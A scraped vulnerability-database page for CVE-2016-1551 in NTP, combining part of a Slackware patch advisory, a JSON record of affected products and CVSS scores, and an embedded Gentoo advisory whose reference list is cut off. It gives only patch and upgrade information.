http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz
Slackware 13.1 package: dfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz
Slackware 13.37 package: e760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: aa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz
Slackware 14.0 package: 3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz
Slackware 14.1 package: dbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz
Slackware -current package: 4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz
Slackware x86_64 -current package: 7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iEYEARECAAYFAlcjyyAACgkQakRjwEAQIjPtSgCdEB0YxCNSAabWZwD+ICyXcqeg 3rIAnRLKXh7P6QXP2t+va4PM0crnd3l4 =VO7T -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0422", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntpsec", "scope": "eq", "trust": 2.4, "vendor": "ntpsec", "version": "a5fb34b9cc89b92a8fef2f459004865c93bb7f92" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.90" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.1.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.7" }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.0.a", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "wap371 wireless access point", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system e-series blade server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "support central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3210" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1210" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sentinel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "network device security assessment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "4.2.8p7", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "BID", "id": "88219" }, { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "NVD", "id": "CVE-2016-1551" }, { "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntpsec:ntpsec:a5fb34b9cc89b92a8fef2f459004865c93bb7f92:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-1551" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Matt Street and others of Cisco ASIG", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-606" } ], "trust": 0.6 }, "cve": "CVE-2016-1551", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 2.6, "confidentialityImpact": "NONE", "exploitabilityScore": 4.9, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 2.6, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-1551", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "exploitabilityScore": 2.2, "impactScore": 1.4, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 3.7, "baseSeverity": "Low", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-1551", "impactScore": null, "integrityImpact": "Low", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-1551", "trust": 1.8, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201604-606", "trust": 0.6, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2016-1551", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-1551" }, { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "NVD", "id": "CVE-2016-1551" }, { "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntpd in NTP 4.2.8p3 and NTPsec a5fb34b9cc89b92a8fef2f459004865c93bb7f92 relies on the underlying operating system to protect it from requests that impersonate reference clocks. Because reference clocks are treated like other peers and stored in the same structure, any packet with a source ip address of a reference clock (127.127.1.1 for example) that reaches the receive() function will match that reference clock\u0027s peer record and will be treated as a trusted peer. Any system that lacks the typical martian packet filtering which would block these packets is in danger of having its time controlled by an attacker. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a remote security vulnerability. \nSuccessful exploits will allow attackers to bypass certain security restrictions and perform some unauthorized actions to the application. This may aid in further attacks. \nVersions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nBackground\n==========\n\nNTP contains software for the Network Time Protocol. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker could possibly cause a Denial of Service condition. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n 